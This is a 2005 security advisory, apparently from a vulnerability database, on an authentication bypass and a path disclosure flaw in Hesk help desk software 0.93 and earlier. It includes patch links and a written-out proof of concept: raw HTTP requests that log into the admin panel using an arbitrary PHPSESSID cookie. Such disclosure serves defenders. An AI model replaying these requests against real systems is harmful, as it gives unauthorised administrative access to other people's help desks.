Hesk Session ID Validation Vulnerability

2005-09-21T00:00:00
ID SECURITYVULNS:DOC:9757
Type securityvulns
Reporter Securityvulns
Modified 2005-09-21T00:00:00

Description

OS2A

Hesk Session ID Validation Vulnerability

OS2A ID: OS2A_1003 Status 9/13/2005 Issue Discovered 9/14/2005 Reported to the vendor 9/18/2005 Patch Released 9/20/2005 Advisory Released

Class: Authentication Bypass Severity: CRITICAL

Overview: Hesk is a PHP based help desk software that runs with a MySQL database. It allows to setup a ticket based support system (helpdesk) for websites. Hesk versions 0.93 and prior are vulnerable to authentication bypass and path disclosure vulnerabilities caused due to improper validation of the HTTP header. This vulnerability can be exploited to bypass authentication mechanism, and also made to reveal system specific information.

Description: Multiple vulnerabilities exist in Hesk ticket based support system.

  1. Authentication Bypass The 'PHPSESSID', Session ID parameter in the HTTP header is not properly validated. A malicious user can log in to the Administrator account by sending a random value to 'PHPSESSID' parameter and posting it to admin.php. This Session ID can then be utilized to access administrative control panel.

This is similar to a previously reported vulnerability where invalid User ID and Password were submitted. In this case, a randomly chosen Session ID is sent along with the login request.

  1. Path Disclosure. Path information can be made to disclose in error pages by passing invalid metacharacters such as "'" or "<" to 'PHPSESSID' field of the HTTP header.

Impact: Successful exploitation can result in a compromise of the application, disclosure of system specific information.

Affected Systems: Hesk 0.93 and prior. Linux (Any), Unix (Any), Windows (Any)

Exploit: 1. HTTP POST request with randomly chosen Session ID: POST admin.php + ("Host: host_ip User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7) Accept: text/xml,application/xml,application/xhtml+xml,text/html Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://host_ip/hesk/admin.php Cookie: PHPSESSID=12345 <!-- Random Session ID --!> Content-Type: application/x-www-form-urlencoded Content-Length: 26 user=1&pass=sdfd&a=do_login");

  1. GET request to administrative control panel: GET admin_main.php + ("Host: host_ip User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7) Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai n Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Cookie: PHPSESSID=12345") <!-- Session ID --!>

Solutions: Patch: http://www.phpjunkyard.com/extras/hesk_0931_patch.zip OR Hesk 0.93.1 from http://www.phpjunkyard.com/free-helpdesk-software.php

Credits: Rajesh Sethumadhavan, Rahul Mohandas, and Jayesh K.S of OS2A have discovered the vulnerability